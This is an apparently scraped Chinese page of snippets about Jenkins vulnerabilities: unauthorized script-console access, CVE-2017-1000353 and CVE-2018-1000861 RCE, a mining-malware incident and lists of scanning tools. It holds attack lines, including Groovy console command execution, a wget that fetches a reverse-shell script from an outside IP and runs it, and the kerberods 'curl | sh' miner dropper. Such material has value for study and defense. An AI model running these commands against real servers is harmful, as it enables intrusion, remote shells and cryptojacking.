首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
jenkins 漏洞
2024-11-04
Jenkins漏洞利用复现
一.未授权访问 访问url: http://172.16.20.134:8080/script 命令执行 println "ls -al".execute().text 也可以利用powershell 或者python脚本反弹shell 二.CVE-2018-1000861 远程命令执行漏洞 payload: securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.gr
应用安全 - 工具|框架 - Java - Jenkins - 漏洞 - 汇总
未授权访问 /script /manage/asynchPeople//config.xml CVE-2015-8103 Date 2015.11 类型反序列化导致远程命令执行 影响范围Jenkins jenkins 〈= LTS 1.625.1Jenkins jenkins 〈= 1.637 CVE-2016-0792 Date 类型 影响范围 CVE-2016-9299 Date 类型 影响范围 cve-2017-1000353 Date 类型远程命令执行 影响范围所有Jenkins主版本均
威胁快报|首爆,新披露Jenkins RCE漏洞成ImposterMiner挖矿木马新“跳板”
简介 阿里云安全于近日捕获到一起使用Jenkins RCE漏洞进行攻击的挖矿事件.除挖矿外,攻击者还曾植入具有C&C功能的tsunami木马,也预留了反弹shell的功能,给用户带来极大安全隐患. 由于攻击者直接复制了Jenkins系列漏洞发现者(Orange.tw)在博客上公布的poc,攻击payload含有"Orange.tw"字样,可能被误认为是漏洞发现者在进行测试,因此我们将木马命名为ImposterMiner(冒充者). 本次事件具有两个特点:一是ImposterMi
Jenkins远程代码执行漏洞
于一个月前,进行服务器巡检时,发现服务器存在不明进程,并且以Jenkins用户身份来运行.当时进行了处理并修复了漏洞.在此补上修复过程 第一反应是Jenkins存在漏洞,于是Google Jenkins漏洞,瞬间出现一大批文章. 影响的范围: 影响低于 2.56 的所有 Jenkins 主线版本 影响低于 2.46.1 的所有 Jenkins LTS 版本 摘自https://xianzhi.aliyun.com/forum/read/1567.html 查看服务器Jenkins版本,正好是2.
Linux-记录一次被当肉鸡行为
转自:http://huoding.com/2016/03/07/495 话说从前些天开始,我的某台服务器不时会出现外网访问响应速度变慢的情况,不过内网访问倒是一直正常.因为并不是核心服务器,所以一开始我便忽略了监控报警,但是随着服务器的可用性越来越差,我不得不腾出手来看看到底发生了什么. 既然是网络问题,那么可以在客户端用「mtr <IP>」检查一下网络情况: 发现丢包主要发生在最后一跳,接着可以在服务器用「sar -n DEV」检查带宽: 明显可见 TX 流量时不时便会到达一定的高峰,说明
[转帖]Scanners-Box 指引
作者:杨文链接:https://zhuanlan.zhihu.com/p/26534414来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 原文地址:We5ter/Scanners-Box https://github.com/We5ter/Scanners-Box/blob/master/README_CN.md Scanners-Box 指引# 简介# Scanners-Box是一个集合github平台上的安全行业从业人员自研开源扫描器的仓库,包括子域名枚举.数
Github安全开源工具集合
Scanners-Box是来自github平台的开源扫描仪的集合,包括子域枚举,数据库漏洞扫描程序,弱密码或信息泄漏扫描仪,端口扫描仪,指纹扫描仪和其他大型扫描仪,模块化扫描仪等.对于其他众所周知的扫描工具,如:Nmap,w3af,brakeman将不会包含在收集范围内. 安全行业从业人员常用工具指引,包括各类在线安全学习资料和安全检测工具,欢迎大家持续贡献! 入门指南 https://wizardforcel.gitbooks.io/web-hacking-101/content/
Scanners-Box:开源扫描器大全 2017-04-22
Scanners-Box:开源扫描器大全 2017-04-22 Scanners-Box是一个集合github平台上的安全行业从业人员自研开源扫描器的仓库,包括子域名枚举.数据库漏洞扫描.弱口令或信息泄漏扫描.端口扫描.指纹识别以及其他大型扫描器或模块化扫描器:该仓库只收录各位网友自己编写的一般性开源扫描器,类似nmap.w3af.brakeman等知名扫描工具不收录. 子域名枚举 https://github.com/lijiejie/subDomainsBrute (经典的子域名爆破枚举脚本
渗透系统虚拟机----win7(渗透工具包)
今天把自己用的win7渗透虚拟机和渗透工具脚本整合到一起备份传网盘了: D:\渗透工具包>dir 驱动器 D 中的卷是 DATA 卷的序列号是 0D74-084B D:\渗透工具包 的目录 // : <DIR> . // : <DIR> .. // : <DIR> arp嗅探 // : <DIR> src // : <DIR> webshell // : <DIR> XSS工具 // : <DIR> 代码审计 //
Linux服务器感染kerberods病毒 | 挖矿病毒查杀及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh)
概要: 一.症状及表现 二.查杀方法 三.病毒分析 四.安全防护 五.参考文章 一.症状及表现 1.CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发现CPU被大量占用: *注:ls top ps等命令已经被病毒的动态链接库劫持,无法正常使用,大家需要下载busybox,具体的安装和下载步骤参见参考文章(https://blog.csdn.net/u010457406/article/details/89328869). 2.crontab 定时
github渗透测试工具库
本文作者:Yunying 原文链接:https://www.cnblogs.com/BOHB-yunying/p/11856178.html 导航: 2.漏洞练习平台 WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.com/710leo/ZVulDrill
github渗透测试工具库[转载]
前言 今天看到一个博客里有这个置顶的工具清单,但是发现这些都是很早以前就有文章发出来的,我爬下来后一直放在txt里吃土.这里一起放出来. 漏洞练习平台 WebGoat漏洞练习平台:https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台:https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台:https://github.com/710leo/ZVulDrill vulapps漏洞练
安全研究 | Jenkins 任意文件读取漏洞分析
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 日的安全通告修复了多个漏洞,其中 SECURITY-914 是由 Orange (博客链接:http://blog.orange.tw/)挖出的 Jenkins 未授权任意文件读取漏洞. 腾讯安全云鼎实验室安全研究人员对该漏洞进行分析发现,利用这个漏洞,攻击者可以读取 Windows 服务器上的任
Jenkins高危代码执行漏洞检测/开源漏洞靶场
漏洞细节可以参看安全客的文章:https://bbs.ichunqiu.com/thread-22507-1-1.html Jenkins-CLI 反序列化代码执行(CVE-2017-1000353),巡风现已支持检测,漏洞检测插件来自社区成员 Dee-Ng.经过验证后我们稍作了修改,已经进行了推送.隔离了外网环境的同学可以手动更新下插件检测. <ignore_js_op> BTW,巡风已经在不少甲方.乙方公司落地部署,其中不乏一些大厂.找工作的同学也可以提插件上来,求 offer 直达用人部
Jenkins反序列化漏洞cve-2017-1000353
一.漏洞原理: 本地没有环境:参考:https://blogs.securiteam.com/index.php/archives/3171 进行学习理解记录. 首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令. 攻击过程学习: 下文的session是一个uuid,类型4 #可以如下生成 session = uuid.uuid4() 1.首先要发送一个请求,是一个下载请求.这个请求是要启动一个双向数据传输频道.频道的标识就是session.
Jenkins远程代码执行漏洞检查(CVE-2017-1000353)
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限 漏洞影响范围: 所有Jenkins主版本均受到影响(包括<=2.56版本)所有Jenkins LTS 均受到影响( 包括<=2.46.1版本) 测试步骤: 1.下载生成反序列的payload: https://github.com/nobleXu/jenkins 2.生成一个jenkins_poc1.ser反序列文件 java -jar jenkins_payload.jar jenk
Jenkins未授权访问脚本执行漏洞
Jenkins未授权访问脚本执行漏洞 步骤 首先找一个站点挂上一个反弹shell脚本,然后在脚本执行框里执行脚本进行下载到tmp目录: println "wget http://47.95.XXX.XXX/xxx.py -P /tmp/".execute().text 执行成功下面Result并没有反馈 然后我们执行命令允许反弹shell脚本 println "python /tmp/xxx.py 140.143.xxx.xxx 1234".execute().te
jenkins弱口令漏洞
jenkins弱口令漏洞 一.漏洞描述 通过暴力破解管理控制台,如果爆破成功,可获得后台管理权限.操作后台,后台可通过脚本命令行功能执行系统命令,如反弹shell等,低权限可以通过创建控制台输出方式执行命令. 二.漏洞环境搭建 1. 官方下载jenkins-2.50-1.1.noarch.rpm,下载地址: http://mirrors.jenkins.io 2.在redhat6.5上安装jenkins 2.1.使用rpm安装 rpm -ivh jenkins-2.50-1.1.noarch.r
jenkins未授权访问漏洞
jenkins未授权访问漏洞 一.漏洞描述 未授权访问管理控制台,可以通过脚本命令行执行系统命令.通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件. 二.漏洞环境搭建 1.官方下载jenkins-1.620-1.1.noarch.rpm,下载地址:http://mirrors.jenkins.io 2.在redhat安装jenkins rpm -ivh jenkins-1.620-1.1.noarch.rpm 3.开启jenkins服
Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)
Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353) 一.漏洞描述 该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露. 二.漏洞影响版本 所有jenkins主版本均受到影响(包括<=2.56版本) 所有的jenkins LTS均受到影响(包括<=2.46.1版本) 三.漏洞环境搭建 1. 官方下载jenkins-2.46-1.1.noarc
热门专题
密码框STYLE样式绑定加函数
GNU GCC 编译器 符合c11标准嘛
linux上qt调用静态链接库编译应用程序
Typecho 前台 getshell复现
hp台式机安装centos过程中鼠标不能用
Redis Desktop Manager 启动显示崩溃
JTA和sqlserver
怎么把几个span并列成一行
resulttype代表什么
emgucv 人脸比对 c#
springboot项目层级
ebs读取ebs txt文件导入
thinkphp5在Linux下Nginx配置问题解决
c# 数据库bit类型SQL查询后不能转化为bool类型
django自定义钩子函数单独验证密码
h5 返回上一个页面并刷新
thinkphp 模板匹配
android 动态添加 子控件
定时运行python脚本 linux
多个txt合并成1个txt